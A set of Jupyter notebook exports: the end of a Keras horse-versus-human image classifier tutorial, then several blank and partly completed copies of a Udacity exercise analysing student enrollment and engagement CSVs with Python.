class_mode='binary')
###Output
_____no_output_____
###Markdown
TrainingLet's train for 15 epochs -- this may take a few minutes to run.Do note the values per epoch.The Loss and Accuracy are a great indication of progress of training. It's making a guess as to the classification of the training data, and then measuring it against the known label, calculating the result. Accuracy is the portion of correct guesses.
###Code
history = model.fit_generator(
train_generator,
steps_per_epoch=8,
epochs=15,
verbose=1,
validation_data = validation_generator,
validation_steps=8)
###Output
_____no_output_____
###Markdown
Running the ModelLet's now take a look at actually running a prediction using the model. This code will allow you to choose 1 or more files from your file system, it will then upload them, and run them through the model, giving an indication of whether the object is a horse or a human.
###Code
import numpy as np
from google.colab import files
from keras.preprocessing import image
uploaded = files.upload()
for fn in uploaded.keys():
# predicting images
path = '/content/' + fn
img = image.load_img(path, target_size=(300, 300))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
images = np.vstack([x])
classes = model.predict(images, batch_size=10)
print(classes[0])
if classes[0]>0.5:
print(fn + " is a human")
else:
print(fn + " is a horse")
###Output
_____no_output_____
###Markdown
Visualizing Intermediate RepresentationsTo get a feel for what kind of features our convnet has learned, one fun thing to do is to visualize how an input gets transformed as it goes through the convnet.Let's pick a random image from the training set, and then generate a figure where each row is the output of a layer, and each image in the row is a specific filter in that output feature map. Rerun this cell to generate intermediate representations for a variety of training images.
###Code
import numpy as np
import random
from tensorflow.keras.preprocessing.image import img_to_array, load_img
# Let's define a new Model that will take an image as input, and will output
# intermediate representations for all layers in the previous model after
# the first.
successive_outputs = [layer.output for layer in model.layers[1:]]
#visualization_model = Model(img_input, successive_outputs)
visualization_model = tf.keras.models.Model(inputs = model.input, outputs = successive_outputs)
# Let's prepare a random input image from the training set.
horse_img_files = [os.path.join(train_horse_dir, f) for f in train_horse_names]
human_img_files = [os.path.join(train_human_dir, f) for f in train_human_names]
img_path = random.choice(horse_img_files + human_img_files)
img = load_img(img_path, target_size=(300, 300)) # this is a PIL image
x = img_to_array(img) # Numpy array with shape (150, 150, 3)
x = x.reshape((1,) + x.shape) # Numpy array with shape (1, 150, 150, 3)
# Rescale by 1/255
x /= 255
# Let's run our image through our network, thus obtaining all
# intermediate representations for this image.
successive_feature_maps = visualization_model.predict(x)
# These are the names of the layers, so can have them as part of our plot
layer_names = [layer.name for layer in model.layers]
# Now let's display our representations
for layer_name, feature_map in zip(layer_names, successive_feature_maps):
if len(feature_map.shape) == 4:
# Just do this for the conv / maxpool layers, not the fully-connected layers
n_features = feature_map.shape[-1] # number of features in feature map
# The feature map has shape (1, size, size, n_features)
size = feature_map.shape[1]
# We will tile our images in this matrix
display_grid = np.zeros((size, size * n_features))
for i in range(n_features):
# Postprocess the feature to make it visually palatable
x = feature_map[0, :, :, i]
x -= x.mean()
x /= x.std()
x *= 64
x += 128
x = np.clip(x, 0, 255).astype('uint8')
# We'll tile each filter into this big horizontal grid
display_grid[:, i * size : (i + 1) * size] = x
# Display the grid
scale = 20. / n_features
plt.figure(figsize=(scale * n_features, scale))
plt.title(layer_name)
plt.grid(False)
plt.imshow(display_grid, aspect='auto', cmap='viridis')
###Output
_____no_output_____
###Markdown
As you can see we go from the raw pixels of the images to increasingly abstract and compact representations. The representations downstream start highlighting what the network pays attention to, and they show fewer and fewer features being "activated"; most are set to zero. This is called "sparsity." Representation sparsity is a key feature of deep learning.These representations carry increasingly less information about the original pixels of the image, but increasingly refined information about the class of the image. You can think of a convnet (or a deep network in general) as an information distillation pipeline. Clean UpBefore running the next exercise, run the following cell to terminate the kernel and free memory resources:
###Code
import os, signal
os.kill(os.getpid(), signal.SIGKILL)
###Output
_____no_output_____ |
L1_Starter_Code.ipynb | ###Markdown
Before we get started, a couple of reminders to keep in mind when using iPython notebooks:- Remember that you can see from the left side of a code cell when it was last run if there is a number within the brackets.- When you start a new notebook session, make sure you run all of the cells up to the point where you last left off. Even if the output is still visible from when you ran the cells in your previous session, the kernel starts in a fresh state so you'll need to reload the data, etc. on a new session.- The previous point is useful to keep in mind if your answers do not match what is expected in the lesson's quizzes. Try reloading the data and run all of the processing steps one by one in order to make sure that you are working with the same variables and data that are at each quiz stage. Load Data from CSVs
###Code
import unicodecsv
## Longer version of code (replaced with shorter, equivalent version below)
# enrollments = []
# f = open('enrollments.csv', 'rb')
# reader = unicodecsv.DictReader(f)
# for row in reader:
# enrollments.append(row)
# f.close()
with open('enrollments.csv', 'rb') as f:
reader = unicodecsv.DictReader(f)
enrollments = list(reader)
#####################################
# 1 #
#####################################
## Read in the data from daily_engagement.csv and project_submissions.csv
## and store the results in the below variables.
## Then look at the first row of each table.
daily_engagement =
project_submissions =
###Output
_____no_output_____
###Markdown
Fixing Data Types
###Code
from datetime import datetime as dt
# Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None
def parse_date(date):
if date == '':
return None
else:
return dt.strptime(date, '%Y-%m-%d')
# Takes a string which is either an empty string or represents an integer,
# and returns an int or None.
def parse_maybe_int(i):
if i == '':
return None
else:
return int(i)
# Clean up the data types in the enrollments table
for enrollment in enrollments:
enrollment['cancel_date'] = parse_date(enrollment['cancel_date'])
enrollment['days_to_cancel'] = parse_maybe_int(enrollment['days_to_cancel'])
enrollment['is_canceled'] = enrollment['is_canceled'] == 'True'
enrollment['is_udacity'] = enrollment['is_udacity'] == 'True'
enrollment['join_date'] = parse_date(enrollment['join_date'])
enrollments[0]
# Clean up the data types in the engagement table
for engagement_record in daily_engagement:
engagement_record['lessons_completed'] = int(float(engagement_record['lessons_completed']))
engagement_record['num_courses_visited'] = int(float(engagement_record['num_courses_visited']))
engagement_record['projects_completed'] = int(float(engagement_record['projects_completed']))
engagement_record['total_minutes_visited'] = float(engagement_record['total_minutes_visited'])
engagement_record['utc_date'] = parse_date(engagement_record['utc_date'])
daily_engagement[0]
# Clean up the data types in the submissions table
for submission in project_submissions:
submission['completion_date'] = parse_date(submission['completion_date'])
submission['creation_date'] = parse_date(submission['creation_date'])
project_submissions[0]
###Output
_____no_output_____
###Markdown
Note when running the above cells that we are actively changing the contents of our data variables. If you try to run these cells multiple times in the same session, an error will occur. Investigating the Data
###Code
#####################################
# 2 #
#####################################
## Find the total number of rows and the number of unique students (account keys)
## in each table.
###Output
_____no_output_____
###Markdown
Problems in the Data
###Code
#####################################
# 3 #
#####################################
## Rename the "acct" column in the daily_engagement table to "account_key".
###Output
_____no_output_____
###Markdown
Missing Engagement Records
###Code
#####################################
# 4 #
#####################################
## Find any one student enrollments where the student is missing from the daily engagement table.
## Output that enrollment.
###Output
_____no_output_____
###Markdown
Checking for More Problem Records
###Code
#####################################
# 5 #
#####################################
## Find the number of surprising data points (enrollments missing from
## the engagement table) that remain, if any.
###Output
_____no_output_____
###Markdown
Tracking Down the Remaining Problems
###Code
# Create a set of the account keys for all Udacity test accounts
udacity_test_accounts = set()
for enrollment in enrollments:
if enrollment['is_udacity']:
udacity_test_accounts.add(enrollment['account_key'])
len(udacity_test_accounts)
# Given some data with an account_key field, removes any records corresponding to Udacity test accounts
def remove_udacity_accounts(data):
non_udacity_data = []
for data_point in data:
if data_point['account_key'] not in udacity_test_accounts:
non_udacity_data.append(data_point)
return non_udacity_data
# Remove Udacity test accounts from all three tables
non_udacity_enrollments = remove_udacity_accounts(enrollments)
non_udacity_engagement = remove_udacity_accounts(daily_engagement)
non_udacity_submissions = remove_udacity_accounts(project_submissions)
print len(non_udacity_enrollments)
print len(non_udacity_engagement)
print len(non_udacity_submissions)
###Output
_____no_output_____
###Markdown
Refining the Question
###Code
#####################################
# 6 #
#####################################
## Create a dictionary named paid_students containing all students who either
## haven't canceled yet or who remained enrolled for more than 7 days. The keys
## should be account keys, and the values should be the date the student enrolled.
paid_students =
###Output
_____no_output_____
###Markdown
Getting Data from First Week
###Code
# Takes a student's join date and the date of a specific engagement record,
# and returns True if that engagement record happened within one week
# of the student joining.
def within_one_week(join_date, engagement_date):
time_delta = engagement_date - join_date
return time_delta.days < 7
#####################################
# 7 #
#####################################
## Create a list of rows from the engagement table including only rows where
## the student is one of the paid students you just found, and the date is within
## one week of the student's join date.
paid_engagement_in_first_week =
###Output
_____no_output_____
###Markdown
Exploring Student Engagement
###Code
from collections import defaultdict
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
engagement_by_account = defaultdict(list)
for engagement_record in paid_engagement_in_first_week:
account_key = engagement_record['account_key']
engagement_by_account[account_key].append(engagement_record)
# Create a dictionary with the total minutes each student spent in the classroom during the first week.
# The keys are account keys, and the values are numbers (total minutes)
total_minutes_by_account = {}
for account_key, engagement_for_student in engagement_by_account.items():
total_minutes = 0
for engagement_record in engagement_for_student:
total_minutes += engagement_record['total_minutes_visited']
total_minutes_by_account[account_key] = total_minutes
import numpy as np
# Summarize the data about minutes spent in the classroom
total_minutes = total_minutes_by_account.values()
print 'Mean:', np.mean(total_minutes)
print 'Standard deviation:', np.std(total_minutes)
print 'Minimum:', np.min(total_minutes)
print 'Maximum:', np.max(total_minutes)
###Output
_____no_output_____
###Markdown
Debugging Data Analysis Code
###Code
#####################################
# 8 #
#####################################
## Go through a similar process as before to see if there is a problem.
## Locate at least one surprising piece of data, output it, and take a look at it.
###Output
_____no_output_____
###Markdown
Lessons Completed in First Week
###Code
#####################################
# 9 #
#####################################
## Adapt the code above to find the mean, standard deviation, minimum, and maximum for
## the number of lessons completed by each student during the first week. Try creating
## one or more functions to re-use the code above.
###Output
_____no_output_____
###Markdown
Number of Visits in First Week
###Code
######################################
# 10 #
######################################
## Find the mean, standard deviation, minimum, and maximum for the number of
## days each student visits the classroom during the first week.
###Output
_____no_output_____
###Markdown
Splitting out Passing Students
###Code
######################################
# 11 #
######################################
## Create two lists of engagement data for paid students in the first week.
## The first list should contain data for students who eventually pass the
## subway project, and the second list should contain data for students
## who do not.
subway_project_lesson_keys = ['746169184', '3176718735']
passing_engagement =
non_passing_engagement =
###Output
_____no_output_____
###Markdown
Comparing the Two Student Groups
###Code
######################################
# 12 #
######################################
## Compute some metrics you're interested in and see how they differ for
## students who pass the subway project vs. students who don't. A good
## starting point would be the metrics we looked at earlier (minutes spent
## in the classroom, lessons completed, and days visited).
###Output
_____no_output_____
###Markdown
Making Histograms
###Code
######################################
# 13 #
######################################
## Make histograms of the three metrics we looked at earlier for both
## students who passed the subway project and students who didn't. You
## might also want to make histograms of any other metrics you examined.
###Output
_____no_output_____
###Markdown
Improving Plots and Sharing Findings
###Code
######################################
# 14 #
######################################
## Make a more polished version of at least one of your visualizations
## from earlier. Try importing the seaborn library to make the visualization
## look better, adding axis labels and a title, and changing one or more
## arguments to the hist() function.
###Output
_____no_output_____
###Markdown
Before we get started, a couple of reminders to keep in mind when using iPython notebooks:- Remember that you can see from the left side of a code cell when it was last run if there is a number within the brackets.- When you start a new notebook session, make sure you run all of the cells up to the point where you last left off. Even if the output is still visible from when you ran the cells in your previous session, the kernel starts in a fresh state so you'll need to reload the data, etc. on a new session.- The previous point is useful to keep in mind if your answers do not match what is expected in the lesson's quizzes. Try reloading the data and run all of the processing steps one by one in order to make sure that you are working with the same variables and data that are at each quiz stage. Load Data from CSVs
###Code
import unicodecsv
## Longer version of code (replaced with shorter, equivalent version below)
# enrollments = []
# f = open('enrollments.csv', 'rb')
# reader = unicodecsv.DictReader(f)
# for row in reader:
# enrollments.append(row)
# f.close()
def read_csv(filename):
with open(filename, 'rb') as f:
reader = unicodecsv.DictReader(f)
return list(reader)
enrollments = read_csv('enrollments.csv')
print(enrollments[0])
#####################################
# 1 #
#####################################
## Read in the data from daily_engagement.csv and project_submissions.csv
## and store the results in the below variables.
## Then look at the first row of each table.
daily_engagement = read_csv('daily_engagement.csv')
print(daily_engagement[0])
project_submissions = read_csv('project_submissions.csv')
print(project_submissions[0])
###Output
{'total_minutes_visited': '11.6793745', 'num_courses_visited': '1.0', 'lessons_completed': '0.0', 'utc_date': '2015-01-09', 'acct': '0', 'projects_completed': '0.0'}
{'completion_date': '2015-01-16', 'creation_date': '2015-01-14', 'account_key': '256', 'processing_state': 'EVALUATED', 'lesson_key': '3176718735', 'assigned_rating': 'UNGRADED'}
###Markdown
Fixing Data Types
###Code
from datetime import datetime as dt
# Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None
def parse_date(date):
if date == '':
return None
else:
return dt.strptime(date, '%Y-%m-%d')
# Takes a string which is either an empty string or represents an integer,
# and returns an int or None.
def parse_maybe_int(i):
if i == '':
return None
else:
return int(i)
# Clean up the data types in the enrollments table
for enrollment in enrollments:
enrollment['cancel_date'] = parse_date(enrollment['cancel_date'])
enrollment['days_to_cancel'] = parse_maybe_int(enrollment['days_to_cancel'])
enrollment['is_canceled'] = enrollment['is_canceled'] == 'True'
enrollment['is_udacity'] = enrollment['is_udacity'] == 'True'
enrollment['join_date'] = parse_date(enrollment['join_date'])
enrollments[0]
# Clean up the data types in the engagement table
for engagement_record in daily_engagement:
engagement_record['lessons_completed'] = int(float(engagement_record['lessons_completed']))
engagement_record['num_courses_visited'] = int(float(engagement_record['num_courses_visited']))
engagement_record['projects_completed'] = int(float(engagement_record['projects_completed']))
engagement_record['total_minutes_visited'] = float(engagement_record['total_minutes_visited'])
engagement_record['utc_date'] = parse_date(engagement_record['utc_date'])
daily_engagement[0]
# Clean up the data types in the submissions table
for submission in project_submissions:
submission['completion_date'] = parse_date(submission['completion_date'])
submission['creation_date'] = parse_date(submission['creation_date'])
project_submissions[0]
###Output
_____no_output_____
###Markdown
Note when running the above cells that we are actively changing the contents of our data variables. If you try to run these cells multiple times in the same session, an error will occur. Investigating the Data
###Code
#####################################
# 2 #
#####################################
## Find the total number of rows and the number of unique students (account keys)
## in each table.
def unique_account_key_count(data, key_name='account_key'):
account_key_set = set()
for enrollment in data:
account_key_set.add(enrollment[key_name])
return len(account_key_set)
enrollment_num_rows = len(enrollments)
enrollment_num_unique_students = unique_account_key_count(enrollments)
print('enrollment', enrollment_num_rows, enrollment_num_unique_students)
engagement_num_rows = len(daily_engagement)
engagement_num_unique_students = unique_account_key_count(daily_engagement, key_name='acct')
print('engagement', engagement_num_rows, engagement_num_unique_students)
submission_num_rows = len(project_submissions)
submission_num_unique_students = unique_account_key_count(project_submissions)
print('submission', submission_num_rows, submission_num_unique_students)
###Output
enrollment 1640 1302
engagement 136240 1237
submission 3642 743
###Markdown
Problems in the Data
###Code
#####################################
# 3 #
#####################################
## Rename the "acct" column in the daily_engagement table to "account_key".
###Output
_____no_output_____
###Markdown
Missing Engagement Records
###Code
#####################################
# 4 #
#####################################
## Find any one student enrollments where the student is missing from the daily engagement table.
## Output that enrollment.
###Output
_____no_output_____
###Markdown
Checking for More Problem Records
###Code
#####################################
# 5 #
#####################################
## Find the number of surprising data points (enrollments missing from
## the engagement table) that remain, if any.
###Output
_____no_output_____
###Markdown
Tracking Down the Remaining Problems
###Code
# Create a set of the account keys for all Udacity test accounts
udacity_test_accounts = set()
for enrollment in enrollments:
if enrollment['is_udacity']:
udacity_test_accounts.add(enrollment['account_key'])
len(udacity_test_accounts)
# Given some data with an account_key field, removes any records corresponding to Udacity test accounts
def remove_udacity_accounts(data):
non_udacity_data = []
for data_point in data:
if data_point['account_key'] not in udacity_test_accounts:
non_udacity_data.append(data_point)
return non_udacity_data
# Remove Udacity test accounts from all three tables
non_udacity_enrollments = remove_udacity_accounts(enrollments)
non_udacity_engagement = remove_udacity_accounts(daily_engagement)
non_udacity_submissions = remove_udacity_accounts(project_submissions)
print len(non_udacity_enrollments)
print len(non_udacity_engagement)
print len(non_udacity_submissions)
###Output
_____no_output_____
###Markdown
Refining the Question
###Code
#####################################
# 6 #
#####################################
## Create a dictionary named paid_students containing all students who either
## haven't canceled yet or who remained enrolled for more than 7 days. The keys
## should be account keys, and the values should be the date the student enrolled.
paid_students =
###Output
_____no_output_____
###Markdown
Getting Data from First Week
###Code
# Takes a student's join date and the date of a specific engagement record,
# and returns True if that engagement record happened within one week
# of the student joining.
def within_one_week(join_date, engagement_date):
time_delta = engagement_date - join_date
return time_delta.days < 7
#####################################
# 7 #
#####################################
## Create a list of rows from the engagement table including only rows where
## the student is one of the paid students you just found, and the date is within
## one week of the student's join date.
paid_engagement_in_first_week =
###Output
_____no_output_____
###Markdown
Exploring Student Engagement
###Code
from collections import defaultdict
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
engagement_by_account = defaultdict(list)
for engagement_record in paid_engagement_in_first_week:
account_key = engagement_record['account_key']
engagement_by_account[account_key].append(engagement_record)
# Create a dictionary with the total minutes each student spent in the classroom during the first week.
# The keys are account keys, and the values are numbers (total minutes)
total_minutes_by_account = {}
for account_key, engagement_for_student in engagement_by_account.items():
total_minutes = 0
for engagement_record in engagement_for_student:
total_minutes += engagement_record['total_minutes_visited']
total_minutes_by_account[account_key] = total_minutes
import numpy as np
# Summarize the data about minutes spent in the classroom
total_minutes = total_minutes_by_account.values()
print 'Mean:', np.mean(total_minutes)
print 'Standard deviation:', np.std(total_minutes)
print 'Minimum:', np.min(total_minutes)
print 'Maximum:', np.max(total_minutes)
###Output
_____no_output_____
###Markdown
Debugging Data Analysis Code
###Code
#####################################
# 8 #
#####################################
## Go through a similar process as before to see if there is a problem.
## Locate at least one surprising piece of data, output it, and take a look at it.
###Output
_____no_output_____
###Markdown
Lessons Completed in First Week
###Code
#####################################
# 9 #
#####################################
## Adapt the code above to find the mean, standard deviation, minimum, and maximum for
## the number of lessons completed by each student during the first week. Try creating
## one or more functions to re-use the code above.
###Output
_____no_output_____
###Markdown
Number of Visits in First Week
###Code
######################################
# 10 #
######################################
## Find the mean, standard deviation, minimum, and maximum for the number of
## days each student visits the classroom during the first week.
###Output
_____no_output_____
###Markdown
Splitting out Passing Students
###Code
######################################
# 11 #
######################################
## Create two lists of engagement data for paid students in the first week.
## The first list should contain data for students who eventually pass the
## subway project, and the second list should contain data for students
## who do not.
subway_project_lesson_keys = ['746169184', '3176718735']
passing_engagement =
non_passing_engagement =
###Output
_____no_output_____
###Markdown
Comparing the Two Student Groups
###Code
######################################
# 12 #
######################################
## Compute some metrics you're interested in and see how they differ for
## students who pass the subway project vs. students who don't. A good
## starting point would be the metrics we looked at earlier (minutes spent
## in the classroom, lessons completed, and days visited).
###Output
_____no_output_____
###Markdown
Making Histograms
###Code
######################################
# 13 #
######################################
## Make histograms of the three metrics we looked at earlier for both
## students who passed the subway project and students who didn't. You
## might also want to make histograms of any other metrics you examined.
###Output
_____no_output_____
###Markdown
Improving Plots and Sharing Findings
###Code
######################################
# 14 #
######################################
## Make a more polished version of at least one of your visualizations
## from earlier. Try importing the seaborn library to make the visualization
## look better, adding axis labels and a title, and changing one or more
## arguments to the hist() function.
###Output
_____no_output_____
###Markdown
Before we get started, a couple of reminders to keep in mind when using iPython notebooks:- Remember that you can see from the left side of a code cell when it was last run if there is a number within the brackets.- When you start a new notebook session, make sure you run all of the cells up to the point where you last left off. Even if the output is still visible from when you ran the cells in your previous session, the kernel starts in a fresh state so you'll need to reload the data, etc. on a new session.- The previous point is useful to keep in mind if your answers do not match what is expected in the lesson's quizzes. Try reloading the data and run all of the processing steps one by one in order to make sure that you are working with the same variables and data that are at each quiz stage. Load Data from CSVs https://storage.googleapis.com/supplemental_media/udacityu/5430778793/table_descriptions.txt
###Code
import unicodecsv
## Longer version of code (replaced with shorter, equivalent version below)
# enrollments = []
# f = open('enrollments.csv', 'rb')
# reader = unicodecsv.DictReader(f)
# for row in reader:
# enrollments.append(row)
# f.close()
enrollments_filename = 'enrollments.csv'
engagement_filename = 'daily_engagement.csv'
submissions_filename = 'project_submissions.csv'
def read_csv(filename):
with open(filename, 'rb') as f:
reader = unicodecsv.DictReader(f)
return list(reader)
#####################################
# 1 #
#####################################
## Read in the data from daily_engagement.csv and project_submissions.csv
## and store the results in the below variables.
## Then look at the first row of each table.
enrollments = read_csv(enrollments_filename)
daily_engagement = read_csv(engagement_filename)
project_submissions = read_csv(submissions_filename)
enrollments
daily_engagement
project_submissions
###Output
_____no_output_____
###Markdown
Fixing Data Types
###Code
from datetime import datetime as dt
# Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None
def parse_date(date):
if date == '':
return None
else:
return dt.strptime(date, '%Y-%m-%d')
# Takes a string which is either an empty string or represents an integer,
# and returns an int or None.
def parse_maybe_int(i):
if i == '':
return None
else:
return int(i)
# Clean up the data types in the enrollments table
for enrollment in enrollments:
enrollment['cancel_date'] = parse_date(enrollment['cancel_date'])
enrollment['days_to_cancel'] = parse_maybe_int(enrollment['days_to_cancel'])
enrollment['is_canceled'] = enrollment['is_canceled'] == 'True'
enrollment['is_udacity'] = enrollment['is_udacity'] == 'True'
enrollment['join_date'] = parse_date(enrollment['join_date'])
enrollments[0]
# Clean up the data types in the engagement table
for engagement_record in daily_engagement:
engagement_record['lessons_completed'] = int(float(engagement_record['lessons_completed']))
engagement_record['num_courses_visited'] = int(float(engagement_record['num_courses_visited']))
engagement_record['projects_completed'] = int(float(engagement_record['projects_completed']))
engagement_record['total_minutes_visited'] = float(engagement_record['total_minutes_visited'])
engagement_record['utc_date'] = parse_date(engagement_record['utc_date'])
daily_engagement[0]
# Clean up the data types in the submissions table
for submission in project_submissions:
submission['completion_date'] = parse_date(submission['completion_date'])
submission['creation_date'] = parse_date(submission['creation_date'])
project_submissions[0]
###Output
_____no_output_____
###Markdown
Note when running the above cells that we are actively changing the contents of our data variables. If you try to run these cells multiple times in the same session, an error will occur. Investigating the Data
###Code
#####################################
# 2 #
#####################################
## Find the total number of rows and the number of unique students (account keys)
## in each table.
for engagement_record in daily_engagement:
engagement_record['account_key'] = engagement_record['acct']
del[engagement_record['acct']]
def get_unique_students(data):
unique_students = set()
for data_point in data:
unique_students.add(data_point['account_key'])
return unique_students
unique_enrollment_students = get_unique_students(enrollments)
len(unique_enrollment_students)
len(daily_engagement)
unique_engagement_students = get_unique_students(daily_engagement)
len(unique_engagement_students)
len(project_submissions)
unique_project_submitters = get_unique_students(project_submissions)
len(unique_project_submitters)
for engagement_record in daily_engagement:
engagement_record['account_key'] = engagement_record['acct']
del[engagement_record['acct']]
###Output
_____no_output_____
###Markdown
Problems in the Data
###Code
#####################################
# 3 #
#####################################
## Rename the "acct" column in the daily_engagement table to "account_key".
daily_engagement[0]['account_key']
###Output
_____no_output_____
###Markdown
Missing Engagement Records
###Code
#####################################
# 4 #
#####################################
## Find any one student enrollments where the student is missing from the daily engagement table.
## Output that enrollment.
for enrollment in enrollments:
student = enrollment['account_key']
if student not in unique_engagement_students:
print(enrollment)
break
###Output
OrderedDict([('account_key', '1219'), ('status', 'canceled'), ('join_date', datetime.datetime(2014, 11, 12, 0, 0)), ('cancel_date', datetime.datetime(2014, 11, 12, 0, 0)), ('days_to_cancel', 0), ('is_udacity', False), ('is_canceled', True)])
###Markdown
Checking for More Problem Records
###Code
#####################################
# 5 #
#####################################
## Find the number of surprising data points (enrollments missing from
## the engagement table) that remain, if any.
num_problem_students = 0
for enrollment in enrollments:
student = enrollment['account_key']
if (student not in unique_engagement_students and enrollment['join_date'] != enrollment['cancel_date']):
print(enrollment)
num_problem_students += 1
num_problem_students
###Output
OrderedDict([('account_key', '1304'), ('status', 'canceled'), ('join_date', datetime.datetime(2015, 1, 10, 0, 0)), ('cancel_date', datetime.datetime(2015, 3, 10, 0, 0)), ('days_to_cancel', 59), ('is_udacity', True), ('is_canceled', True)])
OrderedDict([('account_key', '1304'), ('status', 'canceled'), ('join_date', datetime.datetime(2015, 3, 10, 0, 0)), ('cancel_date', datetime.datetime(2015, 6, 17, 0, 0)), ('days_to_cancel', 99), ('is_udacity', True), ('is_canceled', True)])
OrderedDict([('account_key', '1101'), ('status', 'current'), ('join_date', datetime.datetime(2015, 2, 25, 0, 0)), ('cancel_date', None), ('days_to_cancel', None), ('is_udacity', True), ('is_canceled', False)])
###Markdown
Tracking Down the Remaining Problems
###Code
# Create a set of the account keys for all Udacity test accounts
udacity_test_accounts = set()
for enrollment in enrollments:
if enrollment['is_udacity']:
udacity_test_accounts.add(enrollment['account_key'])
len(udacity_test_accounts)
# Given some data with an account_key field, removes any records corresponding to Udacity test accounts
def remove_udacity_accounts(data):
non_udacity_data = []
for data_point in data:
if data_point['account_key'] not in udacity_test_accounts:
non_udacity_data.append(data_point)
return non_udacity_data
# Remove Udacity test accounts from all three tables
non_udacity_enrollments = remove_udacity_accounts(enrollments)
non_udacity_engagement = remove_udacity_accounts(daily_engagement)
non_udacity_submissions = remove_udacity_accounts(project_submissions)
print(len(non_udacity_enrollments))
print(len(non_udacity_engagement))
print(len(non_udacity_submissions))
###Output
1622
135656
3634
###Markdown
Refining the Question
###Code
#####################################
# 6 #
#####################################
## Create a dictionary named paid_students containing all students who either
## haven't canceled yet or who remained enrolled for more than 7 days. The keys
## should be account keys, and the values should be the date the student enrolled.
paid_students = {}
for enrollment in non_udacity_enrollments:
if (not enrollment['is_canceled'] or enrollment['days_to_cancel']>7):
account_key = enrollment['account_key']
enrollment_date = enrollment['join_date']
if (account_key not in paid_students or enrollment_date > paid_students[account_key]):
paid_students[account_key] = enrollment_date
len(paid_students)
###Output
_____no_output_____
###Markdown
Getting Data from First Week
###Code
# Takes a student's join date and the date of a specific engagement record,
# and returns True if that engagement record happened within one week
# of the student joining.
def within_one_week(join_date, engagement_date):
time_delta = engagement_date - join_date
return time_delta.days < 7 and time_delta.days >= 0
def remove_free_trial_cancels(data):
new_data = []
for data_point in data:
if data_point['account_key'] in paid_students:
new_data.append(data_point)
return new_data
paid_enrollments = remove_free_trial_cancels(non_udacity_enrollments)
paid_engagement = remove_free_trial_cancels(non_udacity_engagement)
paid_submissions = remove_free_trial_cancels(non_udacity_submissions)
print(len(paid_enrollments))
print(len(paid_engagement))
print(len(paid_submissions))
# Número de visitas na primeira semana
for engagement_record in paid_engagement:
if engagement_record['num_courses_visited'] > 0:
engagement_record['has_visited'] = 1
else:
engagement_record['has_visited'] = 0
#####################################
# 7 #
#####################################
## Create a list of rows from the engagement table including only rows where
## the student is one of the paid students you just found, and the date is within
## one week of the student's join date.
paid_engagement_in_first_week = []
for engagement_record in paid_engagement:
account_key = engagement_record['account_key']
join_date = paid_students[account_key]
engagement_record_date = engagement_record['utc_date']
if within_one_week(join_date, engagement_record_date):
paid_engagement_in_first_week.append(engagement_record)
len(paid_engagement_in_first_week)
###Output
_____no_output_____
###Markdown
Exploring Student Engagement
###Code
from collections import defaultdict
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
def group_data(data, key_name):
group_data = defaultdict(list)
for data_point in data:
key = data_point[key_name]
group_data[key].append(data_point)
return group_data
engagement_by_account = group_data(paid_engagement_in_first_week, 'account_key')
# Create a dictionary with the total minutes each student spent in the classroom during the first week.
# The keys are account keys, and the values are numbers (total minutes)
def sum_grouped_items(grouped_data, field_name):
summed_data = {}
for key, data_points in grouped_data.items():
total = 0
for data_point in data_points:
total += data_point[field_name]
summed_data[key] = total
return summed_data
total_minutes_by_accounts = sum_grouped_items(engagement_by_account, 'total_minutes_visited')
import numpy as np
# Summarize the data about minutes spent in the classroom
def describe_data(data):
total_minute_statistics = []
for total_minute in data.values():
total_minute_statistics.append(total_minute)
print('Mean:', np.mean(total_minute_statistics))
print('Standard deviation:', np.std(total_minute_statistics))
print('Minimum:', np.min(total_minute_statistics))
print('Maximum:', np.max(total_minute_statistics))
total_minutes = describe_data(total_minutes_by_accounts)
###Output
Mean: 306.70832675342825
Standard deviation: 412.99693340852957
Minimum: 0.0
Maximum: 3564.7332644989997
###Markdown
Debugging Data Analysis Code
###Code
# max(total_minutes_by_account.items(), key=lambda pair: pair[1])
#####################################
# 8 #
#####################################
## Go through a similar process as before to see if there is a problem.
## Locate at least one surprising piece of data, output it, and take a look at it.
student_with_max_minutes = None
max_minutes = 0
for student, total_minutes in total_minutes_by_account.items():
if total_minutes > max_minutes:
max_minutes = total_minutes
student_with_max_minutes = student
max_minutes
for engagement_record in paid_engagement_in_first_week:
if engagement_record['account_key'] == student_with_max_minutes:
print(engagement_record)
###Output
OrderedDict([('utc_date', datetime.datetime(2015, 7, 9, 0, 0)), ('num_courses_visited', 4), ('total_minutes_visited', 850.519339666), ('lessons_completed', 4), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 10, 0, 0)), ('num_courses_visited', 6), ('total_minutes_visited', 872.633923334), ('lessons_completed', 6), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 11, 0, 0)), ('num_courses_visited', 2), ('total_minutes_visited', 777.018903666), ('lessons_completed', 6), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 12, 0, 0)), ('num_courses_visited', 1), ('total_minutes_visited', 294.568774), ('lessons_completed', 2), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 13, 0, 0)), ('num_courses_visited', 3), ('total_minutes_visited', 471.2139785), ('lessons_completed', 1), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 14, 0, 0)), ('num_courses_visited', 2), ('total_minutes_visited', 298.778345333), ('lessons_completed', 1), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 15, 0, 0)), ('num_courses_visited', 0), ('total_minutes_visited', 0.0), ('lessons_completed', 0), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 0)])
###Markdown
Lessons Completed in First Week
###Code
#####################################
# 9 #
#####################################
## Adapt the code above to find the mean, standard deviation, minimum, and maximum for
## the number of lessons completed by each student during the first week. Try creating
## one or more functions to re-use the code above.
